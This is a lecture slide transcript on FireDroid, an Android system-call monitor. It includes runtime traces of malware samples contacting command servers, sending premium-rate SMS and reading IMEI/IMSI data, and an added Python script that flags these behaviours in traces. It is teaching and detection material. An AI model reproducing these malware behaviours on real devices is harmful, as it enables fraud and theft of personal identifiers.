
Monitoring Malware at Runtime


faraji


Presentation Transcript


  1. Monitoring Malware at Runtime

  2. From Last Lecture
  • Malware authors use advanced coding techniques to avoid detection
  • AnserverBot is a very sophisticated piece of software
  • AVS is lagging behind
  • Low detection rate on new malware
  • Large exposure window before updating the DB
  • Main issue: relying only on app signatures
  • What we need is a tool to detect runtime behaviour

  3. FireDroid
  • Our group is developing a new Android security framework
  • FireDroid is capable of monitoring app execution and enforcing security policies
  • No need to modify the Android OS code!
  • The only modification is to insert a line of text in the init.rc file
  • FireDroid enables us to monitor the system call execution of apps (and malware)

  4. System Call Interposition
  • System calls are used by apps to interact with the kernel
  • By intercepting sensitive system calls we can enforce security policies to better protect Android
  • We can also use FireDroid to provide us with information about the system calls executed by apps

  5. Malware Genome Project
  • Collection of 2GB of malware samples
  • We have executed some of these samples within the FireDroid sandbox
  • In the following, we are going to see some more details
  • After the semester break, Daniel will provide a live demo

  6. Plankton
  • Communication with a C&C server
  • Sends some info when the installation is complete
  • Together with some settings of the phone

  7. Opening a socket
  [1743] syscall=socket(281) domain:PF_INET6 type:SOCK_STREAM protocol:IPPROTO_IP
  ******************************
  [1743] syscall=bind(282) socket: socket:[26088] sa_family = AF_INET6 port = 0 address = ::
  ******************************
  [1743] syscall=connect(283) socket: socket:[26088] sa_family = AF_INET6 port = 80 address = 208.93.141.140
  ******************************

  8. Establishing a connection
  ******************************
  [1743] syscall=sendto(290) socket: socket:[26088] Connected Socket! data len: 168
  data: POST /ProtocolGW/installation HTTP/1.1
  Content-Length: 1426
  Content-Type: application/x-www-form-urlencoded
  Host: www.searchwebmobile.com
  Connection: Keep-Alive
  ******************************
  [1743] syscall=sendto(290) socket: socket:[26088] Connected Socket! data len: 1024
  data: action=get&applicationId=325842969&developerId=752469853&deviceId=000000000000000&currentVersion=-1&permissions=android…..

  9. FakePlayer
  • The main activity is to send SMS
  • It gets the handler for the SMS service from the Service Manager
  • Then it sends SMS to a premium number (7132) with different subscription codes

  10. Sending SMS
  [*1905] ioctl on /dev/binder with BINDER_WRITE_READ cmd:BC_TRANSACTION:
  target name = android.os.IServiceManager target = 0x0 code = SVC_MGR_GET_SERVICE
  service name = isms data size = 80
  ******************************
  [*1905] ioctl on /dev/binder with BINDER_WRITE_READ cmd:BC_TRANSACTION:
  target name = com.android.internal.telephony.ISms target = 0x9 code = 5 (sendText) data size = 128
  Destination: 7132 SMS Body: 849321

  11. AnserverBot
  • Retrieves information from the Telephony services
    • Telephone number
    • International Mobile Station Equipment Identity (IMEI)
    • International Mobile Subscriber Identity (IMSI)
  • This info is quite sensitive because it specifically points at YOU!

  12. Getting the PhoneSubInfoService
  [*2071] ioctl on /dev/binder with BINDER_WRITE_READ cmd:BC_TRANSACTION:
  target name = android.os.IServiceManager target = 0x0 code = SVC_MGR_GET_SERVICE
  service name = iphonesubinfo
  ******************************
  [*2071] ioctl on /dev/binder with BINDER_WRITE_READ cmd:BC_TRANSACTION:
  target name = com.android.internal.telephony.IPhoneSubInfo target = 0xe code = 5 data size = 100
  data in text format: code 5: getLineNumber: Retrieves the phone number string for line 1

  13. Getting More Info
  ******************************
  … code 1: getDeviceId: Retrieves the unique device ID, e.g., IMEI for GSM phones.
  ******************************
  … code 4: getIccSerialNumber: Retrieves the serial number of the ICC, if applicable.
  ******************************
  … code 2: getDeviceSvn: Retrieves the software version number for the device, e.g., IMEI/SV for GSM phones.
  ******************************
  … code 3: getSubscriberId: Retrieves the unique subscriber ID, e.g., IMSI for GSM phones.

  14. AnserverBot Fetching from Baidu
  ******************************
  [1639] syscall=connect(283) socket: socket:[57270] sa_family = AF_INET6 port = 80 address = 220.181.111.147
  ******************************
  [1639] syscall=sendto(290) socket: socket:[57270] Connected Socket! data len: 153
  data: GET / HTTP/1.1
  User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.0.4; sdk Build/MR1)^M
  Host: www.baidu.com
  Connection: Keep-Alive
  Accept-Encoding: gzip

  15. AnserverBot Fetching from Baidu
  [1639] syscall=recvfrom(292) socket: socket:[57270] Connected Socket! data len: 128
  data: HTTP/1.1 200 OK^M
  Set-Cookie: BAIDUID=127C8FA29422CAB3BA61707A4969F5DB:FG=1; max-age=31536000; expires=Tue, 29-Oct-13 01:17:10 GM
  ******************************
  [1639] syscall=recvfrom(292) :00:00 GMT; path=/; domain=.baidu.com^M
  P3P: CP='' OTI DSP COR IVA OUR IND COM ``^M
  Cache-Control: no-cache^M
  Content-type: text/html
  ******************************
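The traces on slides 7 to 13 show the three behaviours the lecture cares about: a connect()/sendto() pair to a C&C host, a binder sendText to a short premium number, and IPhoneSubInfo reads of the IMEI/IMSI. The following added example (written for this page, not FireDroid's own code) runs simple detection rules over a constructed trace in that format; the sample lines are modelled on the slides with the field names normalised (e.g. sa_family, BC_TRANSACTION), and the thresholds and rule names are assumptions.

```python
import re

# Constructed sample trace, modelled on the FireDroid output in the slides
# (one record per line; the "****" separator lines are not needed here).
SAMPLE_TRACE = """\
[1743] syscall=connect(283) socket: socket:[26088] sa_family = AF_INET6 port = 80 address = 208.93.141.140
[1743] syscall=sendto(290) socket: socket:[26088] data len: 168 data: POST /ProtocolGW/installation HTTP/1.1 Host: www.searchwebmobile.com
[*1905] ioctl on /dev/binder cmd:BC_TRANSACTION: target name = com.android.internal.telephony.ISms target = 0x9 code = 5 (sendText) Destination: 7132 SMS Body: 849321
[*2071] ioctl on /dev/binder cmd:BC_TRANSACTION: target name = com.android.internal.telephony.IPhoneSubInfo target = 0xe code = 1 data size = 100
[*2071] ioctl on /dev/binder cmd:BC_TRANSACTION: target name = com.android.internal.telephony.IPhoneSubInfo target = 0xe code = 3 data size = 100
"""

# IPhoneSubInfo transaction codes as listed on slides 12 and 13.
PHONE_SUB_INFO = {1: "getDeviceId", 2: "getDeviceSvn", 3: "getSubscriberId",
                  4: "getIccSerialNumber", 5: "getLineNumber"}

CONNECT = re.compile(r"^\[(\d+)\] syscall=connect\(\d+\).*port = (\d+) address = (\S+)")
SENDTO = re.compile(r"^\[(\d+)\] syscall=sendto\(\d+\).*data: (\S+ \S+ HTTP/[\d.]+).*Host: (\S+)")
BINDER = re.compile(r"^\[\*?(\d+)\] ioctl on /dev/binder.*target name = (\S+).*code = (\d+)")
SMS = re.compile(r"Destination: (\S+) SMS Body: (\S+)")

def analyse(trace):
    """Return (pid, finding) tuples for the behaviours the slides describe."""
    findings = []
    for line in trace.splitlines():
        if (m := CONNECT.match(line)):
            pid, port, addr = m.groups()
            if addr not in ("::", "::1", "127.0.0.1"):      # ignore local sockets
                findings.append((int(pid), f"network connect to {addr}:{port}"))
        elif (m := SENDTO.match(line)):
            pid, request, host = m.groups()
            findings.append((int(pid), f"HTTP {request.split()[0]} to {host}"))
        elif (m := BINDER.match(line)):
            pid, target, code = m.groups()
            code = int(code)
            if target.endswith(".ISms") and code == 5:     # ISms code 5 = sendText
                sms = SMS.search(line)
                dest, body = sms.groups() if sms else ("?", "?")
                # assumed heuristic: short all-digit numbers are premium-rate codes
                kind = "premium-rate" if dest.isdigit() and len(dest) < 7 else "plain"
                findings.append((int(pid), f"{kind} SMS to {dest}: {body}"))
            elif target.endswith(".IPhoneSubInfo") and code in PHONE_SUB_INFO:
                findings.append((int(pid), f"identifier read: {PHONE_SUB_INFO[code]}"))
    return findings

if __name__ == "__main__":
    for pid, finding in analyse(SAMPLE_TRACE):
        print(f"pid {pid}: {finding}")
```

Each finding is attributed to the pid in the trace, so a policy layer could map it back to the app that FireDroid is sandboxing.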

  16. Questions?
